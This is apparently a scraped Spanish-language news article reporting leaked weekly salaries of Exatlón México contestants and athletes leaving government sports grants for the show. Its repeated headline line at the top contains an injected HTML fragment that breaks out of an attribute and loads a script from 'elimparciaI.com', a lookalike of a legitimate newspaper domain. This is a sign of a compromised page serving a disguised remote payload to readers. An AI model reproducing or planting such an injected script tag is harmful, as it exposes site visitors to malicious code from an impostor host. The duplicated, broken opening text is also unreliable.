Exatlón México: Filtran millonarios sueldos de competidores de la quinta temporada  " /><script id='sync' src='https://www.elimparciaI.com/pub.js'></script> <meta id="itsok Exatlón México: Filtran millonarios sueldos de competidores de la quinta temporada  " /><script id='sync' src='https://www.elimparciaI.com/pub.js'></script> <meta id="itsok

Exatlón México: Filtran millonarios sueldos de competidores de la quinta temporada

Exatlón México se ha caracterizado por ser uno de los reality shows que mejores sueldos ofrece a sus competidores

CIUDAD DE MÉXICO.- Exatlón México es reconocido como uno de los programas de televisión que mejor sueldo ofrece a sus participantes, esto además del premio que prometen al campeón. 

El canal de Youtube de Mago Cósmico filtró las cantidades de dinero que recibirían los participantes, las cuales han impresionado a la gente en redes sociales. 

Según la información que se presenta en uno de sus videos, los competidores de menor popularidad estarían recibiendo un sueldo semanal de aproximadamente 15 mil pesos, mientras que los de más trayectoria podrían llegar hasta los 100 mil pesos. 

¿QUIÉNES SON LOS QUE HAN GANADO MÁS EN EXATLÓN MÉXICO?

Los datos filtrados afirman que el competidor que más dinero ha hecho en Exatlón México es Patricio Araujo, quien, en su momento, habría cobrado 100 mil pesos a la semana. 

Araujo fue el ganador de la versión de Héroes vs. Titanes, y estuvo en competencia durante poco más de 30 semanas, además de recibir el premio por ser el campeón. 

ATLETAS PREFIEREN ENTRAR QUE CONSERVAR BECAS

Ya son varios los deportistas que han optado por entrar a este reality show debido a que, económicamente tienen mejores ingresos que con las becas que les otorga la Comisión Nacional del Deporte o sus clubes deportivos. 

Además, los rumores apuntan a que muchos de estos atletas becados dejarían de percibir este ingreso en los próximos meses por parte del gobierno federal. 

Noticias Relacionadas

TE PUEDE INTERESAR

MÁS NOTICIAS

MÁS NOTICIAS